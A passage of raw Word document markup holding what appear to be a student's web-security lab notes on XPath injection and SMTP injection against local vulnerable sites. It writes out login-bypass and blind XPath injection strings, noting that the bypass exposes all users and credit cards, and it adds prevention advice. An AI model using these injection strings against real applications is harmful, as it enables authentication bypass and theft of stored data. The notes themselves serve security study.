      <w:r w:rsidRPr="00420570">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> XPath Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD75B9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC3CCCC" w14:textId="57B1D49E" w:rsidR="00F17628" w:rsidRPr="00F17628" w:rsidRDefault="00F17628" w:rsidP="00F17628">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F17628">
        <w:t>Blind XPath Injection works even with no knowledge of XML structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1894A253" w14:textId="7D6EB40C" w:rsidR="00F17628" w:rsidRPr="00F17628" w:rsidRDefault="00F17628" w:rsidP="00F17628">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F17628">
        <w:t>Attackers use node positions instead of node names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1924196E" w14:textId="65FCC6F2" w:rsidR="00F17628" w:rsidRPr="00F17628" w:rsidRDefault="00F17628" w:rsidP="00F17628">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F17628">
        <w:t>Metadata functions like name() reveal structure character by character</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F04B2F" w14:textId="73BCAE4A" w:rsidR="00F17628" w:rsidRPr="00F17628" w:rsidRDefault="00F17628" w:rsidP="00F17628">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F17628">
        <w:t>Data is extracted using yes/no responses from the application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558102B8" w14:textId="4F7C4B1F" w:rsidR="00F17628" w:rsidRPr="00F17628" w:rsidRDefault="00F17628" w:rsidP="00F17628">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F17628">
        <w:t>Entire XML documents can be stolen without seeing direct output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F77B17" w14:textId="4AB13818" w:rsidR="00C96DED" w:rsidRPr="002348BB" w:rsidRDefault="002348BB" w:rsidP="00392B91">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002348BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Observing XPath Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AD0B53" w14:textId="4AD7E073" w:rsidR="002348BB" w:rsidRDefault="00C56426" w:rsidP="00392B91">
      <w:r>
        <w:t>Browser:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD86287" w14:textId="0252E787" w:rsidR="00C56426" w:rsidRDefault="00C56426" w:rsidP="00392B91">
      <w:r w:rsidRPr="00C56426">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4188E429" wp14:editId="436E4C19">
            <wp:extent cx="5731510" cy="1630680"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="43109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4477" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId112"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1630680"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70492D76" w14:textId="2E3EE7F0" w:rsidR="00C56426" w:rsidRDefault="00C56426" w:rsidP="00392B91">
      <w:r>
        <w:t>Step1: (Goal: Normal login)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546202D8" w14:textId="42144034" w:rsidR="00C56426" w:rsidRDefault="00C56426" w:rsidP="00392B91">
      <w:r w:rsidRPr="00C56426">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DEFF31E" wp14:editId="7F383829">
            <wp:extent cx="5731510" cy="1668145"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="198875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55963" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId113"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1668145"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7275570E" w14:textId="1A08266E" w:rsidR="00C56426" w:rsidRDefault="00C56426" w:rsidP="00392B91">
      <w:r>
        <w:t xml:space="preserve">Step2: (Goal: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C56426">
        <w:t>Authentication Bypass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) Dawes: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C56426">
        <w:t>' or 'a'='a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E7626F" w14:textId="33FC2142" w:rsidR="00C56426" w:rsidRDefault="00C56426" w:rsidP="00392B91">
      <w:r w:rsidRPr="00C56426">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A94AADB" wp14:editId="1036B96D">
            <wp:extent cx="5731510" cy="2633980"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="9333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55724" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId114"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2633980"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AB9DD0" w14:textId="5DF3B1CF" w:rsidR="00C56426" w:rsidRDefault="00C56426" w:rsidP="00392B91">
      <w:r w:rsidRPr="00C56426">
        <w:lastRenderedPageBreak/>
        <w:t>Logs in. Shows ALL users + credit cards</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF003BC" w14:textId="17F02EF9" w:rsidR="00C56426" w:rsidRDefault="0030697D" w:rsidP="00392B91">
      <w:r>
        <w:t xml:space="preserve">Step3: (Goal: </w:t>
      </w:r>
      <w:r w:rsidRPr="0030697D">
        <w:t>Boolean Test</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) Dawes: </w:t>
      </w:r>
      <w:r w:rsidRPr="0030697D">
        <w:t>' or 1=1 and 'a'='a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179D8522" w14:textId="281910C1" w:rsidR="0030697D" w:rsidRDefault="0030697D" w:rsidP="00392B91">
      <w:r w:rsidRPr="0030697D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64A49460" wp14:editId="57515ABB">
            <wp:extent cx="5731510" cy="2641600"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="8077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774" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId115"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2641600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="387EB9B0" w14:textId="77777777" w:rsidR="0030697D" w:rsidRDefault="0030697D" w:rsidP="00392B91">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Now using, Dawes:</w:t>
      </w:r>
      <w:r w:rsidRPr="0030697D">
        <w:t xml:space="preserve"> ' or 1=2 and 'a'='a</w:t>
      </w:r>
      <w:r w:rsidRPr="0030697D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F2E500" w14:textId="21E06490" w:rsidR="0030697D" w:rsidRDefault="0030697D" w:rsidP="00392B91">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6007A134" wp14:editId="0226B452">
            <wp:extent cx="5731510" cy="1287780"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="141674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3692" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId116"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1287780"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD6A18C" w14:textId="02CD6C03" w:rsidR="0030697D" w:rsidRDefault="0030697D" w:rsidP="0030697D">
      <w:r w:rsidRPr="0030697D">
        <w:t>Different behavio</w:t>
      </w:r>
      <w:r w:rsidR="00AB40EA">
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="0030697D">
        <w:t>r → vulnerability confirmed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E92496" w14:textId="782253A3" w:rsidR="00FE48C3" w:rsidRDefault="00FE48C3" w:rsidP="0030697D">
      <w:r>
        <w:t xml:space="preserve">Step4: (Goal: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE48C3">
        <w:t>Blind XPath Injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) Dawes: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE48C3">
        <w:t>' or substring(name(parent::*[position()=1]),1,1)='a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2773DC49" w14:textId="0F19B8FD" w:rsidR="00FE48C3" w:rsidRDefault="00FE48C3" w:rsidP="0030697D">
      <w:r w:rsidRPr="00FE48C3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68DA7DC7" wp14:editId="76D69B2D">
            <wp:extent cx="5731510" cy="2628265"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="55722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735" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId117"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2628265"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7F3C90" w14:textId="77777777" w:rsidR="00FE48C3" w:rsidRPr="00FE48C3" w:rsidRDefault="00FE48C3" w:rsidP="00FE48C3">
      <w:r w:rsidRPr="00FE48C3">
        <w:t>Page loads → correct guess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1E37AC" w14:textId="77777777" w:rsidR="00C56426" w:rsidRDefault="00C56426" w:rsidP="00392B91"/>
    <w:p w14:paraId="553E7445" w14:textId="2A4E6C9A" w:rsidR="000B58E7" w:rsidRDefault="000B58E7" w:rsidP="00392B91">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Prevention:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC0A44F" w14:textId="48443BBA" w:rsidR="000B58E7" w:rsidRPr="000B58E7" w:rsidRDefault="000B58E7" w:rsidP="000B58E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B58E7">
        <w:t>XPath Injection occurs when user input controls XPath queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6C3EB1" w14:textId="7A2673CD" w:rsidR="000B58E7" w:rsidRPr="000B58E7" w:rsidRDefault="000B58E7" w:rsidP="000B58E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B58E7">
        <w:t>Only simple data should ever be inserted into XPath expressions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76ADFDE4" w14:textId="014030CE" w:rsidR="000B58E7" w:rsidRPr="000B58E7" w:rsidRDefault="000B58E7" w:rsidP="000B58E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B58E7">
        <w:t>Use a strict whitelist (preferably alphanumeric only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF1FBC2" w14:textId="22C37D4F" w:rsidR="000B58E7" w:rsidRPr="000B58E7" w:rsidRDefault="000B58E7" w:rsidP="000B58E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B58E7">
        <w:t>Block all characters that can alter XPath logic or structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D53F28E" w14:textId="208B6867" w:rsidR="000B58E7" w:rsidRPr="000B58E7" w:rsidRDefault="000B58E7" w:rsidP="000B58E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B58E7">
        <w:t>Reject invalid input outright — never try to sanitize it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BE4EDA" w14:textId="77777777" w:rsidR="000B58E7" w:rsidRDefault="000B58E7" w:rsidP="00392B91"/>
    <w:p w14:paraId="3EF30D3E" w14:textId="56019AE8" w:rsidR="00917FD1" w:rsidRPr="00917FD1" w:rsidRDefault="00051263" w:rsidP="00392B91">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00051263">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Injecting into SMTP</w:t>
      </w:r>
      <w:r w:rsidR="00917FD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72135685" w14:textId="41DF65D3" w:rsidR="007A702A" w:rsidRPr="00B86C3D" w:rsidRDefault="007A702A" w:rsidP="007A702A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B86C3D">
        <w:t>Websites send email using SMTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEB25EC" w14:textId="57BA015D" w:rsidR="007A702A" w:rsidRPr="00B86C3D" w:rsidRDefault="007A702A" w:rsidP="007A702A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B86C3D">
        <w:t>They often insert user input directly into emails</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1AC771" w14:textId="6293D916" w:rsidR="007A702A" w:rsidRPr="00B86C3D" w:rsidRDefault="007A702A" w:rsidP="007A702A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B86C3D">
        <w:t>If input is not cleaned:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50622BDE" w14:textId="77777777" w:rsidR="007A702A" w:rsidRPr="00B86C3D" w:rsidRDefault="007A702A" w:rsidP="007A702A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B86C3D">
        <w:t>Attackers can add extra email headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6139BA1D" w14:textId="77777777" w:rsidR="007A702A" w:rsidRPr="00B86C3D" w:rsidRDefault="007A702A" w:rsidP="007A702A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B86C3D">
        <w:t>Or inject real SMTP commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA5DBE6" w14:textId="1800F3D9" w:rsidR="007A702A" w:rsidRPr="00B86C3D" w:rsidRDefault="007A702A" w:rsidP="007A702A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B86C3D">
        <w:t>This lets attackers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF1FFF0" w14:textId="77777777" w:rsidR="007A702A" w:rsidRPr="00B86C3D" w:rsidRDefault="007A702A" w:rsidP="007A702A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="105"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B86C3D">
        <w:t>Send spam</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF47DEB" w14:textId="77777777" w:rsidR="007A702A" w:rsidRPr="00B86C3D" w:rsidRDefault="007A702A" w:rsidP="007A702A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="105"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B86C3D">
        <w:t>Send emails to hidden recipients</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378F7125" w14:textId="77777777" w:rsidR="007A702A" w:rsidRPr="00B86C3D" w:rsidRDefault="007A702A" w:rsidP="007A702A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="105"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B86C3D">
        <w:t>Abuse the website’s mail server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0823F4" w14:textId="77777777" w:rsidR="007A702A" w:rsidRDefault="007A702A" w:rsidP="00392B91"/>
    <w:p w14:paraId="216DD7BE" w14:textId="5879FECB" w:rsidR="00A8564B" w:rsidRPr="0008176C" w:rsidRDefault="0008176C" w:rsidP="00392B91">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0008176C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Observing SMTP injection on a local vulnerable website:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736748A2" w14:textId="7053E65C" w:rsidR="0008176C" w:rsidRDefault="0008176C" w:rsidP="00392B91">
      <w:r>
        <w:t>Vuln_smtp.py:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E6AFBA" w14:textId="1615152A" w:rsidR="0008176C" w:rsidRDefault="0008176C" w:rsidP="00392B91">
      <w:r w:rsidRPr="0008176C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41D9A3A1" wp14:editId="27B07D30">
            <wp:extent cx="5731510" cy="4241165"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="182794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9992" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId118"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="4241165"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A12EA7F" w14:textId="7D132BC3" w:rsidR="0008176C" w:rsidRDefault="0008176C" w:rsidP="00392B91">
      <w:r w:rsidRPr="0008176C">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6382D199" wp14:editId="6AE94879">
            <wp:extent cx="5731510" cy="2863850"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="16920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227" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId119"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2863850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F4445A" w14:textId="0EA08FC6" w:rsidR="0008176C" w:rsidRDefault="0008176C" w:rsidP="00392B91">
      <w:r>
        <w:t>Terminal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8E8252" w14:textId="633DD37D" w:rsidR="0008176C" w:rsidRDefault="0008176C" w:rsidP="00392B91">
      <w:r w:rsidRPr="0008176C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55E75859" wp14:editId="75F9BE2B">
            <wp:extent cx="5731510" cy="1261110"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="172420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4962" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId120"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1261110"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="15762CD3" w14:textId="79F359D8" w:rsidR="0008176C" w:rsidRDefault="0008176C" w:rsidP="00392B91">
      <w:r>
        <w:t>Browser:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A3DDB6" w14:textId="0F34161F" w:rsidR="0008176C" w:rsidRDefault="0008176C" w:rsidP="00392B91">
      <w:r w:rsidRPr="0008176C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C414F3E" wp14:editId="6B0FEB55">
            <wp:extent cx="5731510" cy="2184400"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="428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434" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId121"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2184400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B1766A" w14:textId="77777777" w:rsidR="0008176C" w:rsidRDefault="0008176C">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F307688" w14:textId="4065FD41" w:rsidR="0008176C" w:rsidRDefault="0008176C" w:rsidP="00392B91">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Step1: (Goal: Normal use)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE9B226" w14:textId="7E1397DD" w:rsidR="0008176C" w:rsidRDefault="0008176C" w:rsidP="00392B91">
      <w:r w:rsidRPr="0008176C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50B5E99A" wp14:editId="777FFCB6">
            <wp:extent cx="5731510" cy="2300605"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="86606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4962" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId122"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2300605"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6690D8" w14:textId="5BB65BD4" w:rsidR="0008176C" w:rsidRDefault="0008176C" w:rsidP="00392B91">
      <w:r>
        <w:t>When clicked on “send” button:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B89E9A" w14:textId="2951AFAE" w:rsidR="0008176C" w:rsidRDefault="0008176C" w:rsidP="00392B91">
      <w:r w:rsidRPr="0008176C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DCD684C" wp14:editId="2DDA33B3">
            <wp:extent cx="5731510" cy="2283460"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="75679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90105" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId123"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2283460"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
